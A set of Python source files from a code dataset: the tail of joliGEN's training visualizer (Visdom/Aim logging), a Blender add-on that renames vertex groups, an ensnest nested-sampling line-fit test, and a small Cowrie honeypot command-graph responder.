/web/images/\n self.web_dir = os.path.join(opt.checkpoints_dir, opt.name, \"web\")\n self.img_dir = os.path.join(self.web_dir, \"images\")\n self.losses_path = os.path.join(self.web_dir, \"losses.json\")\n self.metrics_path = os.path.join(self.web_dir, \"metrics.json\")\n print(\"create web directory %s...\" % self.web_dir)\n util.mkdirs([self.web_dir, self.img_dir])\n # create a logging file to store training losses\n self.log_name = os.path.join(opt.checkpoints_dir, opt.name, \"loss_log.txt\")\n with open(self.log_name, \"a\") as log_file:\n now = time.strftime(\"%c\")\n log_file.write(\n \"================ Training Loss (%s) ================\\n\" % now\n )\n\n def reset(self):\n \"\"\"Reset the self.saved status\"\"\"\n self.saved = False\n\n def create_visdom_connections(self):\n \"\"\"If the program could not connect to Visdom server, this function will start a new server at port < self.port >\"\"\"\n cmd = sys.executable + \" -m visdom.server -p %d &>/dev/null &\" % self.port\n print(\"\\n\\nCould not connect to Visdom server. \\n Trying to start a server....\")\n print(\"Command: %s\" % cmd)\n Popen(cmd, shell=True, stdout=PIPE, stderr=PIPE)\n\n def display_current_results(\n self, visuals, epoch, save_result, params=[], first=False, phase=\"train\"\n ):\n if \"visdom\" in self.display_type:\n self.display_current_results_visdom(\n visuals, epoch, save_result, params, phase=phase\n )\n if \"aim\" in self.display_type:\n self.display_current_results_aim(visuals, epoch, save_result, params, first)\n\n def display_current_results_visdom(\n self, visuals, epoch, save_result, params, phase\n ):\n \"\"\"Display current results on visdom; save current results to an HTML file.\n\n Parameters:\n visuals (OrderedDict) - - dictionary of images to display or save\n epoch (int) - - the current epoch\n save_result (bool) - - if save the current results to an HTML file\n \"\"\"\n if self.display_id > 0: # show images in the browser using visdom\n ncols = self.ncols\n if ncols >= 0: # show all the images in one visdom panel\n max_ncol = 0\n for temp in visuals:\n if max_ncol < len(temp):\n max_ncol = len(temp)\n\n if ncols == 0:\n ncols = max_ncol\n else:\n ncols = min(ncols, max_ncol)\n\n h, w = next(iter(visuals[0].values())).shape[:2]\n table_css = \"\"\"\"\"\" % (\n w,\n h,\n ) # create a table css\n # create a table of images.\n title = self.name\n label_html = \"\"\n label_html_row = \"\"\n param_html = \"\"\n param_html_row = \"\"\n images = []\n idx = 0\n for param in params.items():\n param_html_row += \"| %s | \" % param[0]\n param_html_row += \"%s | \" % param[1]\n param_html += \"%s
\" % param_html_row\n param_html_row = \"\"\n\n for visual_group in visuals:\n label_html_row = \"\"\n for label, image in visual_group.items():\n image_numpy = util.tensor2im(image)\n label_html_row += \"%s | \" % label\n images.append(image_numpy.transpose([2, 0, 1]))\n idx += 1\n if idx % ncols == 0:\n label_html += \"%s
\" % label_html_row\n label_html_row = \"\"\n white_image = np.ones_like(image_numpy.transpose([2, 0, 1])) * 255\n while idx % ncols != 0:\n images.append(white_image)\n label_html_row += \" | \"\n idx += 1\n if label_html_row != \"\":\n label_html += \"%s
\" % label_html_row\n try:\n if phase == \"train\":\n win_id = 1\n elif phase == \"test\":\n win_id = 2\n\n self.vis.images(\n images,\n nrow=ncols,\n win=self.display_id + win_id,\n padding=2,\n opts=dict(title=title + \" \" + phase + \" images\"),\n )\n label_html = \"\" % label_html\n param_html = \"\" % param_html\n self.vis.text(\n table_css + label_html,\n win=self.display_id + 3,\n opts=dict(title=title + \" labels\"),\n )\n self.vis.text(\n table_css + param_html,\n win=self.display_id + 4,\n opts=dict(title=title + \" params\"),\n )\n\n if self.nets_arch is not None:\n self.vis.text(\n \"\" + self.nets_arch + \"\",\n win=self.display_id + 5,\n opts=dict(title=title + \" architecture \"),\n )\n\n except VisdomExceptionBase:\n self.create_visdom_connections()\n\n else: # show each image in a separate visdom panel;\n idx = 1\n try:\n for visual_group in visuals:\n for label, image in visual_group.items():\n image_numpy = util.tensor2im(image)\n self.vis.image(\n image_numpy.transpose([2, 0, 1]),\n opts=dict(title=label),\n win=self.display_id + idx,\n )\n idx += 1\n except VisdomExceptionBase:\n self.create_visdom_connections()\n\n if self.use_html and (\n save_result or not self.saved\n ): # save images to an HTML file if they haven't been saved.\n self.saved = True\n # save images to the disk\n for visual_group in visuals:\n for label, image in visual_group.items():\n image_numpy = util.tensor2im(image)\n img_path = os.path.join(\n self.img_dir, \"epoch%.3d_%s.png\" % (epoch, label)\n )\n util.save_image(image_numpy, img_path)\n\n # update website\n webpage = html_util.HTML(\n self.web_dir, \"Experiment name = %s\" % self.name, refresh=0\n )\n for n in range(epoch, 0, -1):\n webpage.add_header(\"epoch [%d]\" % n)\n ims, txts, links = [], [], []\n\n for visual_group in visuals:\n for label, image_numpy in visual_group.items():\n image_numpy = util.tensor2im(image)\n img_path = \"epoch%.3d_%s.png\" % (n, label)\n ims.append(img_path)\n txts.append(label)\n links.append(img_path)\n webpage.add_images(ims, txts, links, width=self.win_size)\n webpage.save()\n\n # Save latest images\n\n for visual_group in visuals:\n for label, image in visual_group.items():\n image_numpy = util.tensor2im(image)\n img_path = os.path.join(self.img_dir, \"latest_%s.png\" % label)\n util.save_image(image_numpy, img_path)\n\n def plot_current_losses(self, epoch, counter_ratio, losses):\n if \"visdom\" in self.display_type:\n self.plot_current_losses_visdom(epoch, counter_ratio, losses)\n if \"aim\" in self.display_type:\n self.plot_current_losses_aim(epoch, counter_ratio, losses)\n\n def plot_current_losses_aim(self, epoch, counter_ratio, losses):\n \"\"\"display the current losses on aim\"\"\"\n self.aim_run.track(losses, epoch=epoch, context={\"train\": True})\n\n def plot_current_losses_visdom(self, epoch, counter_ratio, losses):\n \"\"\"display the current losses on visdom display: dictionary of error labels and values\n\n Parameters:\n epoch (int) -- current epoch\n counter_ratio (float) -- progress (percentage) in the current epoch, between 0 to 1\n losses (OrderedDict) -- training losses stored in the format of (name, float) pairs\n \"\"\"\n if not hasattr(self, \"plot_data\"):\n self.plot_data = {\"X\": [], \"Y\": [], \"legend\": list(losses.keys())}\n self.plot_data[\"X\"].append(epoch + counter_ratio)\n if len(self.plot_data[\"legend\"]) == 1:\n self.plot_data[\"Y\"].append(losses[self.plot_data[\"legend\"][0]])\n X = np.array(self.plot_data[\"X\"])\n Y = np.array(self.plot_data[\"Y\"])\n else:\n 
self.plot_data[\"Y\"].append([losses[k] for k in self.plot_data[\"legend\"]])\n X = np.stack(\n [np.array(self.plot_data[\"X\"])] * len(self.plot_data[\"legend\"]), 1\n )\n Y = np.array(self.plot_data[\"Y\"])\n try:\n self.vis.line(\n Y,\n X,\n opts={\n \"title\": \" loss over time\",\n \"legend\": self.plot_data[\"legend\"],\n \"xlabel\": \"epoch\",\n \"ylabel\": \"loss\",\n },\n win=self.display_id,\n )\n except VisdomExceptionBase:\n self.create_visdom_connections()\n\n with open(self.losses_path, \"w\") as fp:\n json.dump(self.plot_data, fp)\n\n # losses: same format as |losses| of plot_current_losses\n def print_current_losses(self, epoch, iters, losses, t_comp, t_data_mini_batch):\n \"\"\"print current losses on console; also save the losses to the disk\n\n Parameters:\n epoch (int) -- current epoch\n iters (int) -- current training iteration during this epoch (reset to 0 at the end of every epoch)\n losses (OrderedDict) -- training losses stored in the format of (name, float) pairs\n t_comp (float) -- computational time per data point (normalized by batch_size)\n t_data (float) -- data loading time per data point (normalized by batch_size)\n \"\"\"\n message = (\n \"(epoch: %d, iters: %d, time comput per image: %.3f, time data mini batch: %.3f) \"\n % (epoch, iters, t_comp, t_data_mini_batch)\n )\n for k, v in losses.items():\n message += \"%s: %.6f \" % (k, v)\n\n print(message) # print the message\n with open(self.log_name, \"a\") as log_file:\n log_file.write(\"%s\\n\" % message) # save the message\n\n def display_current_results_aim(\n self, visuals, epoch, save_result, params=[], first=False\n ):\n \"\"\"Display results on aim\"\"\"\n if first == True: # fist call, record params\n self.aim_run[\"params\"] = params # hyper parameters\n\n # images\n import aim\n\n aim_images = []\n for visual_group in visuals:\n for label, image in visual_group.items():\n image_numpy = util.tensor2im(image)\n aim_images.append(\n aim.Image(Image.fromarray(image_numpy), caption=label)\n )\n self.aim_run.track(\n aim_images, name=\"generated\", epoch=epoch, context={\"train\": True}\n )\n\n def display_img(self, img_path):\n im = Image.open(img_path)\n im = np.array(im)\n im = np.transpose(im, (2, 0, 1))\n img_name = img_path.split(\"/\")[-1].split(\".\")[0]\n self.vis.image(im, opts=dict(title=self.name + \" \" + img_name))\n\n def plot_metrics_dict(\n self, name, epoch, counter_ratio, metrics, title, ylabel, win_id\n ):\n \"\"\"Update a dict of metrics: labels and values and display it on visdom display\n\n Parameters:\n name (str) -- identifier of the plot\n epoch (int) -- current epoch\n counter_ratio (float) -- progress (percentage) in the current epoch, between 0 to 1\n metrics (OrderedDict) -- metrics stored in format (name, float)\n title (str) -- Plot title\n ylabel (str) -- y label\n window_id (int) -- Visdom window id\n \"\"\"\n if name not in self.metrics_dict:\n self.metrics_dict[name] = {\"X\": [], \"Y\": [], \"legend\": list(metrics.keys())}\n plot_metrics = self.metrics_dict[name]\n plot_metrics[\"X\"].append(epoch + counter_ratio)\n plot_metrics[\"Y\"].append([metrics[k] for k in plot_metrics[\"legend\"]])\n X = np.stack([np.array(plot_metrics[\"X\"])] * len(plot_metrics[\"legend\"]), 1)\n Y = np.array(plot_metrics[\"Y\"])\n try:\n # Resize needed due to a bug in visdom 0.1.8.9\n if Y.shape[1] == 1:\n X = X.reshape(X.shape[:1])\n Y = Y.reshape(Y.shape[:1])\n\n self.vis.line(\n Y,\n X,\n opts={\n \"title\": self.name + \" \" + title,\n \"legend\": plot_metrics[\"legend\"],\n 
\"xlabel\": \"epoch\",\n \"ylabel\": ylabel,\n },\n win=self.display_id + win_id,\n )\n except VisdomExceptionBase:\n self.create_visdom_connections()\n\n with open(self.metrics_path, \"w\") as fp:\n json.dump(self.metrics_dict, fp)\n\n def plot_current_metrics(self, epoch, counter_ratio, metrics):\n \"\"\"display the current fid values on visdom display: dictionary of fid labels and values\n\n Parameters:\n epoch (int) -- current epoch\n counter_ratio (float) -- progress (percentage) in the current epoch, between 0 to 1\n fids (OrderedDict) -- training fid values stored in the format of (name, float) pairs\n \"\"\"\n self.plot_metrics_dict(\n \"metric\",\n epoch,\n counter_ratio,\n metrics,\n title=\"metrics over time\",\n ylabel=\"value\",\n win_id=6,\n )\n\n def plot_current_D_accuracies(self, epoch, counter_ratio, accuracies):\n \"\"\"display the current fid values on visdom display: dictionary of fid labels and values\n\n Parameters:\n epoch (int) -- current epoch\n counter_ratio (float) -- progress (percentage) in the current epoch, between 0 to 1\n accuracies (OrderedDict) -- accuracy values stored in the format of (name, float) pairs\n \"\"\"\n self.plot_metrics_dict(\n \"D_accuracy\",\n epoch,\n counter_ratio,\n accuracies,\n title=\"accuracy over time\",\n ylabel=\"accuracy\",\n win_id=7,\n )\n\n def plot_current_APA_prob(self, epoch, counter_ratio, p):\n self.plot_metrics_dict(\n \"APA_prob\",\n epoch,\n counter_ratio,\n p,\n title=\"APA params over time\",\n ylabel=\"prob APA\",\n win_id=8,\n )\n\n def plot_current_miou(self, epoch, counter_ratio, miou):\n \"\"\"display the current fid values on visdom display: dictionary of fid labels and values\n\n Parameters:\n epoch (int) -- current epoch\n counter_ratio (float) -- progress (percentage) in the current epoch, between 0 to 1\n miouf_s (OrderedDict) -- training miou_f_s values stored in the format of (name, float) pairs\n \"\"\"\n self.plot_metrics_dict(\n \"miou\",\n epoch,\n counter_ratio,\n miou,\n title=\"miou over time\",\n ylabel=\"miou\",\n win_id=9,\n )\n\n def print_networks(self, nets, verbose):\n \"\"\"Print the total number of parameters in the network and (if verbose) network architecture\n\n Parameters:\n nets (dict) -- dict of networks to display\n verbose (bool) -- if verbose: print the network architecture\n \"\"\"\n print(\"---------- Networks initialized -------------\")\n self.nets_arch = \"\"\n for name in nets.keys():\n if isinstance(name, str):\n net = nets[name]\n num_params = 0\n for param in net.parameters():\n num_params += param.numel()\n if verbose:\n self.nets_arch += (\n \"\\n---------------------------------------------------\\n\"\n )\n self.nets_arch += \"[Network %s]\" % (name)\n self.nets_arch += \"\\n\" + str(summary(net, depth=12))\n self.nets_arch += (\n \"\\n---------------------------------------------------\\n\"\n )\n else:\n self.nets_arch = None\n\n print(\n \"[Network %s] Total number of parameters : %.3f M\"\n % (name, num_params / 1e6)\n )\n\n print(\"-----------------------------------------------\")\n\n def load_data(self):\n if os.path.isfile(self.losses_path):\n with open(self.losses_path, \"r\") as fp:\n self.plot_data = json.load(fp)\n next_epoch = math.ceil(self.plot_data[\"X\"][-1])\n else:\n next_epoch = self.opt.train_epoch_count\n\n if os.path.isfile(self.metrics_path):\n with open(self.metrics_path, \"r\") as fp:\n self.metrics_dict = json.load(fp)\n\n return 
next_epoch\n","repo_name":"jolibrain/joliGEN","sub_path":"util/visualizer.py","file_name":"visualizer.py","file_ext":"py","file_size_in_byte":22265,"program_lang":"python","lang":"en","doc_type":"code","stars":161,"dataset":"github-code","pt":"2"}
+{"seq_id":"4098204529","text":"import bpy\r\nfrom bpy_extras.io_utils import ImportHelper, ExportHelper\r\nimport csv\r\n\r\nbl_info = {\r\n \"name\": \"VertexGroup Renamer\",\r\n \"author\": \"takec\",\r\n \"version\": (1, 2),\r\n \"blender\": (3, 4, 0),\r\n \"location\": \"View3D > Tool Shelf > Renamer > VertexGroup Renamer\",\r\n \"description\": \"Renames vertex groups based on bone mappings\",\r\n \"category\": \"Object\"\r\n}\r\n\r\n\r\nclass MappingPairProperty(bpy.types.PropertyGroup):\r\n src: bpy.props.StringProperty(name=\"src\")\r\n dst: bpy.props.StringProperty(name=\"dst\")\r\n\r\n\r\nclass VertexGroupRenamerProperties(bpy.types.PropertyGroup):\r\n armature_source: bpy.props.PointerProperty(\r\n name=\"src\",\r\n type=bpy.types.Object,\r\n poll=lambda self, obj: obj.type == \"ARMATURE\"\r\n )\r\n armature_target: bpy.props.PointerProperty(\r\n name=\"trg\",\r\n type=bpy.types.Object,\r\n poll=lambda self, obj: obj.type == \"ARMATURE\"\r\n )\r\n bone_max_distance: bpy.props.FloatProperty(\r\n name=\"max distance\",\r\n default=1.0,\r\n min=0,\r\n step=1,\r\n precision=6,\r\n unit=\"LENGTH\",\r\n )\r\n mapping_collection: bpy.props.CollectionProperty(\r\n type=MappingPairProperty,\r\n )\r\n mapping_active_index: bpy.props.IntProperty()\r\n\r\n\r\nclass VERTEX_GROUP_RENAMER_UL_MappingPair(bpy.types.UIList):\r\n def draw_item(self,\r\n context,\r\n layout:bpy.types.UILayout,\r\n data,\r\n item,\r\n icon,\r\n active_data,\r\n active_peoperty,\r\n index,\r\n flt_flag):\r\n enable = (flt_flag & self.bitflag_filter_item)\r\n if self.use_filter_invert:\r\n enable = not enable\r\n if enable:\r\n if item[\"src\"] == item[\"dst\"]:\r\n layout.label(icon=\"CHECKMARK\")\r\n else:\r\n layout.label(icon=\"BLANK1\")\r\n layout.prop(item, \"src\", text=\"\", emboss=False, translate=False)\r\n layout.prop(item, \"dst\", text=\"\", emboss=False, translate=False)\r\n\r\n def filter_items(self, context, data, propname):\r\n items = getattr(data, propname)\r\n flt_flags = []\r\n flt_neworder = []\r\n\r\n if self.filter_name:\r\n flt_flags = bpy.types.UI_UL_list.filter_items_by_name(\r\n self.filter_name, self.bitflag_filter_item, items, \"src\"\r\n )\r\n else:\r\n flt_flags = [self.bitflag_filter_item] * len(items)\r\n\r\n if self.use_filter_sort_alpha:\r\n flt_neworder = bpy.types.UI_UL_list.sort_items_by_name(items, \"src\")\r\n\r\n return flt_flags, flt_neworder\r\n\r\n\r\nclass VERTEX_GROUP_RENAMER_OT_MappingCollection_Add(bpy.types.Operator):\r\n bl_idname = \"vertex_group_renamer.mapping_collection_add\"\r\n bl_label = \"add mapping_pair to collection\"\r\n\r\n def execute(self, context):\r\n context.scene.VertexGroupRenamerProperty.mapping_collection.add()\r\n return {\"FINISHED\"}\r\n\r\n\r\nclass VERTEX_GROUP_RENAMER_OT_MappingCollection_Remove(bpy.types.Operator):\r\n bl_idname = \"vertex_group_renamer.mapping_collection_remove\"\r\n bl_label = \"remove mapping_pair from collection\"\r\n\r\n def execute(self, context):\r\n props = context.scene.VertexGroupRenamerProperty\r\n mapping_collection = props.mapping_collection\r\n active_index = props.mapping_active_index\r\n mapping_collection.remove(active_index)\r\n active_index = min(active_index, len(mapping_collection) - 1)\r\n return {\"FINISHED\"}\r\n\r\n\r\nclass VERTEX_GROUP_RENAMER_OT_MappingCollection_Clear(bpy.types.Operator):\r\n bl_idname = \"vertex_group_renamer.mapping_collection_clear\"\r\n bl_label = \"clear mapping collection\"\r\n\r\n def execute(self, context):\r\n props = context.scene.VertexGroupRenamerProperty\r\n 
mapping_collection = props.mapping_collection\r\n mapping_collection.clear()\r\n return {\"FINISHED\"}\r\n\r\n\r\nclass VERTEX_GROUP_RENAMER_OT_MappingCollection_Import(bpy.types.Operator, ImportHelper):\r\n bl_idname = \"vertex_group_renamer.mapping_collection_import\"\r\n bl_label = \"import mapping from csv\"\r\n filter_glob: bpy.props.StringProperty(\r\n default=\"*.csv\",\r\n options={\"HIDDEN\"},\r\n )\r\n\r\n def execute(self, context):\r\n props = context.scene.VertexGroupRenamerProperty\r\n mapping_collection = props.mapping_collection\r\n mapping_collection.clear()\r\n with open(self.filepath, \"r\", encoding=\"utf-8\", newline=\"\") as f:\r\n reader = csv.reader(f)\r\n for row in reader:\r\n pair = mapping_collection.add()\r\n pair.src = row[0]\r\n pair.dst = row[1]\r\n return {\"FINISHED\"}\r\n\r\n\r\nclass VERTEX_GROUP_RENAMER_OT_MappingCollection_Export(bpy.types.Operator, ExportHelper):\r\n bl_idname = \"vertex_group_renamer.mapping_collection_export\"\r\n bl_label = \"export mapping to csv\"\r\n filename_ext = \".csv\"\r\n filter_glob: bpy.props.StringProperty(\r\n default=\"*.csv\",\r\n options={\"HIDDEN\"},\r\n )\r\n\r\n def execute(self, context):\r\n props = context.scene.VertexGroupRenamerProperty\r\n mapping_collection = props.mapping_collection\r\n with open(self.filepath, \"w\", encoding=\"utf-8\", newline=\"\") as f:\r\n writer = csv.writer(f)\r\n for pair in mapping_collection:\r\n writer.writerow((pair.src, pair.dst))\r\n return {\"FINISHED\"}\r\n\r\n\r\nclass VERTEX_GROUP_RENAMER_MT_MappingCollection_Special(bpy.types.Menu):\r\n bl_idname = \"VERTEX_GROUP_RENAMER_MT_mapping_collection_special\"\r\n bl_label = \"mapping collection's menu\"\r\n\r\n def draw(self, context):\r\n layout = self.layout\r\n layout.operator(VERTEX_GROUP_RENAMER_OT_MappingCollection_Clear.bl_idname, text=\"Clear\", icon=\"TRASH\")\r\n layout.separator()\r\n layout.operator(VERTEX_GROUP_RENAMER_OT_MappingCollection_Import.bl_idname, text=\"import from csv\")\r\n layout.operator(VERTEX_GROUP_RENAMER_OT_MappingCollection_Export.bl_idname, text=\"export to csv\")\r\n\r\n\r\nclass VERTEX_GROUP_RENAMER_PT_ToolShelf(bpy.types.Panel):\r\n bl_idname = \"VERTEX_GROUP_RENAMER_PT_tool_shelf\"\r\n bl_label = \"VertexGroup Renamer\"\r\n bl_space_type = \"VIEW_3D\"\r\n bl_region_type = \"UI\"\r\n bl_category = \"Renamer\"\r\n\r\n def draw(self, context):\r\n layout = self.layout\r\n scene = context.scene\r\n props = scene.VertexGroupRenamerProperty\r\n layout.label(text=\"Armature pair\")\r\n layout.prop(props, \"armature_source\")\r\n layout.prop(props, \"armature_target\")\r\n layout.prop(props, \"bone_max_distance\")\r\n layout.operator(VERTEX_GROUP_RENAMER_OT_GetMappingFromArmaturePair.bl_idname, text=\"Get Mapping from Armature\")\r\n layout.separator()\r\n\r\n layout.label(text=\"Mapping Pair\")\r\n row = layout.row()\r\n row.template_list(\r\n VERTEX_GROUP_RENAMER_UL_MappingPair.__name__, \"\",\r\n props, \"mapping_collection\", props, \"mapping_active_index\")\r\n side = row.column()\r\n col = side.column(align=True)\r\n col.operator(VERTEX_GROUP_RENAMER_OT_MappingCollection_Add.bl_idname, text=\"\", icon=\"ADD\")\r\n col.operator(VERTEX_GROUP_RENAMER_OT_MappingCollection_Remove.bl_idname, text=\"\", icon=\"REMOVE\")\r\n side.separator()\r\n side.menu(VERTEX_GROUP_RENAMER_MT_MappingCollection_Special.bl_idname, text=\"\", icon=\"DOWNARROW_HLT\")\r\n\r\n layout.separator()\r\n layout.operator(VERTEX_GROUP_RENAMER_OT_Rename.bl_idname, text=\"Rename VertexGroup\")\r\n\r\n\r\nclass 
VERTEX_GROUP_RENAMER_OT_GetMappingFromArmaturePair(bpy.types.Operator):\r\n bl_idname = \"vertex_group_renamer.get_mapping_from_armature_pair\"\r\n bl_label = \"get mapping from armature pair\"\r\n bl_description = \"get mapping from armature pair.\"\r\n bl_options = {\"REGISTER\", \"UNDO\"}\r\n\r\n def execute(self, context):\r\n scene = context.scene\r\n props = scene.VertexGroupRenamerProperty\r\n armature_src = props.armature_source\r\n armature_dst = props.armature_target\r\n bone_max_distance = props.bone_max_distance\r\n mapping_collection = props.mapping_collection\r\n\r\n if (armature_src is None) or (armature_dst is None):\r\n return {\"CANCELLED\"}\r\n\r\n matrix_world_src = armature_src.matrix_world\r\n matrix_world_dst = armature_dst.matrix_world\r\n\r\n # マッピング情報を取得\r\n bone_mapping = {}\r\n\r\n for bone_src in armature_src.data.bones:\r\n mapped_bone = None\r\n # 名前を元にマッピング\r\n for bone_trg in armature_dst.data.bones:\r\n if bone_src.name == bone_trg.name:\r\n mapped_bone = bone_trg\r\n break\r\n\r\n if mapped_bone is not None:\r\n bone_mapping[bone_src.name] = mapped_bone.name\r\n continue\r\n\r\n # 同じ名前のボーンが無く、同じ階層のボーンがあれば、Headが一番近いボーンにマッピング\r\n bone_src_depth = len(bone_src.parent_recursive)\r\n minimum_distance = None\r\n for bone_trg in armature_dst.data.bones:\r\n bone_trg_depth = len(bone_trg.parent_recursive)\r\n if bone_src_depth == bone_trg_depth:\r\n src_pos = matrix_world_src @ bone_src.head_local\r\n dst_pos = matrix_world_dst @ bone_trg.head_local\r\n distance = (src_pos - dst_pos).length\r\n if (\r\n (distance <= bone_max_distance)\r\n and ((minimum_distance is None) or (minimum_distance > distance))\r\n ):\r\n minimum_distance = distance\r\n mapped_bone = bone_trg\r\n\r\n # マッピング先が無ければ、空文字でマッピング\r\n if mapped_bone is not None:\r\n bone_mapping[bone_src.name] = mapped_bone.name\r\n else:\r\n bone_mapping[bone_src.name] = \"\"\r\n\r\n # mappingをコレクションに変換\r\n mapping_collection.clear()\r\n for src, dst in bone_mapping.items():\r\n pair = mapping_collection.add()\r\n pair.src = src\r\n pair.dst = dst\r\n return {\"FINISHED\"}\r\n\r\n\r\nclass VERTEX_GROUP_RENAMER_OT_Rename(bpy.types.Operator):\r\n bl_idname = \"vertex_group_renamer.rename\"\r\n bl_label = \"Rename VertexGroup\"\r\n bl_description = \"Rename VertexGroup with mapping.\"\r\n bl_options = {\"REGISTER\", \"UNDO\"}\r\n\r\n def execute(self, context):\r\n mapping = {}\r\n mapping_collection = context.scene.VertexGroupRenamerProperty.mapping_collection\r\n for pair in mapping_collection:\r\n mapping[pair.src] = pair.dst\r\n\r\n # 選択したMeshのVertex Group名を変更\r\n for obj in bpy.context.selected_objects:\r\n if obj.type == \"MESH\":\r\n vg_name_list = [vg.name for vg in obj.vertex_groups]\r\n for src_name in vg_name_list:\r\n if src_name not in mapping:\r\n continue\r\n dst_name = mapping[src_name]\r\n if (dst_name == \"\") or (src_name == dst_name):\r\n continue\r\n if dst_name in [vg.name for vg in obj.vertex_groups]:\r\n # add weight to dst and delete src\r\n src_vg = obj.vertex_groups[src_name]\r\n dst_vg = obj.vertex_groups[dst_name]\r\n for v in obj.data.vertices:\r\n try:\r\n weight = src_vg.weight(v.index)\r\n dst_vg.add([v.index], weight, \"ADD\")\r\n except RuntimeError:\r\n pass\r\n obj.vertex_groups.remove(src_vg)\r\n else:\r\n # rename\r\n src_vg = obj.vertex_groups[src_name]\r\n src_vg.name = dst_name\r\n\r\n return {\"FINISHED\"}\r\n\r\n\r\nclasses = [\r\n MappingPairProperty,\r\n VertexGroupRenamerProperties,\r\n VERTEX_GROUP_RENAMER_OT_MappingCollection_Add,\r\n 
VERTEX_GROUP_RENAMER_OT_MappingCollection_Remove,\r\n VERTEX_GROUP_RENAMER_OT_MappingCollection_Clear,\r\n VERTEX_GROUP_RENAMER_OT_MappingCollection_Import,\r\n VERTEX_GROUP_RENAMER_OT_MappingCollection_Export,\r\n VERTEX_GROUP_RENAMER_MT_MappingCollection_Special,\r\n VERTEX_GROUP_RENAMER_UL_MappingPair,\r\n VERTEX_GROUP_RENAMER_OT_Rename,\r\n VERTEX_GROUP_RENAMER_OT_GetMappingFromArmaturePair,\r\n VERTEX_GROUP_RENAMER_PT_ToolShelf,\r\n]\r\n\r\n\r\ndef register():\r\n for cls in classes:\r\n bpy.utils.register_class(cls)\r\n bpy.types.Scene.VertexGroupRenamerProperty = bpy.props.PointerProperty(type=VertexGroupRenamerProperties)\r\n\r\n\r\ndef unregister():\r\n del bpy.types.Scene.VertexGroupRenamerProperty\r\n for cls in reversed(classes):\r\n bpy.utils.unregister_class(cls)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n register()\r\n","repo_name":"takecccc/vertex_group_renamer","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":13099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"40621104047","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom ensnest import mpNestedSampler, model\nfrom ensnest import stdplots\n\nclass lineModel(model.Model):\n\n def set_parameters(self,data):\n self.names = ['A', 'mu', 'line_sigma', 'noise_sigma']\n self.bounds = [[0.05, 10.], [0., 64.], [0.05, 10.], [0.5, 5.]]\n self.data = data\n self.x = np.arange(0,64, step=1)\n\n def f(self, A ,mu,sigma, x):\n return A*np.exp(- ((x - mu)/sigma)**2)\n\n def log_errs(self, t):\n return -0.5*t**2\n\n @model.Model.varenv\n def log_likelihood(self, vars):\n '''L is the product of the error function calculated in the residual (data - model)'''\n logl = np.zeros(vars.shape)\n for x_,d_ in zip(self.x, self.data):\n logl += self.log_errs( (self.f(vars['A'], vars['mu'], vars['line_sigma'], x_) - d_)/vars['noise_sigma'])\\\n - np.log(vars['noise_sigma']) - 0.5*np.log(2*np.pi)\n return logl\n\n @model.Model.auto_bound\n @model.Model.varenv\n def log_prior(self, vars):\n return -np.log(vars['A']*vars['line_sigma'])\n\n\ndata = np.array([1.42, 0.468, 0.762,\n -1.312, 2.029, 0.086,\n 1.249, -0.368, -0.657,\n -1.294, 0.235, -0.192,\n -0.269,0.827,-0.685,\n -0.702,-0.937,1.331,\n -1.772,-0.530,0.330,\n 1.205,1.613,0.3,\n -0.046,-0.026,-0.519,\n 0.924,0.230,0.877,\n -0.650,-1.004,0.248,\n -1.169,0.915,1.113,\n 1.463,2.732,0.571,\n 0.865,-0.849,-0.171,\n 1.031,1.105,-0.344,\n -0.087,-0.351,1.248,\n 0.001,0.360,-0.497,\n -0.072,1.094,-1.425,\n 0.283,-1.526,-1.174,\n -0.558,1.282,-0.384,\n -0.120,-0.187,0.646,0.399])\n\nM = lineModel(data)\nns = mpNestedSampler(M, nlive=1000, evosteps=400, filename='line', load_old=False)\nns.run()\n\nstdplots.hist_points(ns)\nstdplots.XLplot(ns)\n\nfig, ax = plt.subplots(1)\nplt.plot(M.x, M.data)\n\nx_ = np.linspace(min(M.x), max(M.x), 1000)\nsamp = ns.ew_samples['position'].copy().astype(M.position_t)\nm = np.zeros((len(samp), len(x_)))\nfor i in range(len(samp)):\n m[i] = M.f(samp['A'][i], samp['mu'][i], samp['line_sigma'][i], x_)\n\nplt.plot(x_, np.mean(m, axis=0))\np20,p80 = np.percentile(m,[20,80], axis=0)\n\nplt.fill_between(x_,p20, p80, zorder = -100, color = 'turquoise', alpha=0.5)\nplt.savefig('line.png')\n","repo_name":"djanloo/ensnest","sub_path":"test/line_inference_test.py","file_name":"line_inference_test.py","file_ext":"py","file_size_in_byte":2354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"19946630048","text":"import json\n\nfrom graphresponder import UnknownCommand\n\n\nclass GraphResponder(object):\n \"\"\"A stateful responder which stores its command-response pairs in a graph.\n Calling the response() method does depth-traversal.\"\"\"\n\n GRAPH_BLACKLIST_KEYS = ['_edges']\n\n def __init__(self, filename='graph.json'):\n self.filename = filename\n self.load()\n self.stack = None\n\n def reset_state(self):\n \"\"\"Reset the pointer to the root of the graph\"\"\"\n self.stack = None\n\n def load(self):\n \"\"\"Load graph from JSON file\"\"\"\n try:\n with open(self.filename) as graph_file:\n self.graph = json.load(graph_file)\n except IOError:\n self.graph = {}\n\n def response(self, command):\n \"\"\"Return the response for a particular command\"\"\"\n try:\n if self.stack:\n response = self.stack[command]['value']\n self.stack = self.stack[command]['_edges']\n else:\n response = self.graph[command]['value']\n self.stack = self.graph[command]['_edges']\n return response\n except KeyError:\n raise UnknownCommand\n\n def known_commands(self):\n \"\"\"Return the list of known commands at the current tree depth\"\"\"\n if self.stack:\n commands = self._get_keys(self.stack)\n else:\n commands = self._get_keys(self.graph)\n return commands\n\n def _get_keys(self, dictionary):\n \"\"\"Exclude meta-keys from the graph dictionary\"\"\"\n return [key for key in dict.keys(dictionary) if key not in self.GRAPH_BLACKLIST_KEYS]\n\n\nRESPONDER = GraphResponder()\n","repo_name":"tgenov/MSC2018-Code","sub_path":"cowrie-session-graph/graphresponder.py","file_name":"graphresponder.py","file_ext":"py","file_size_in_byte":1687,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"2"}
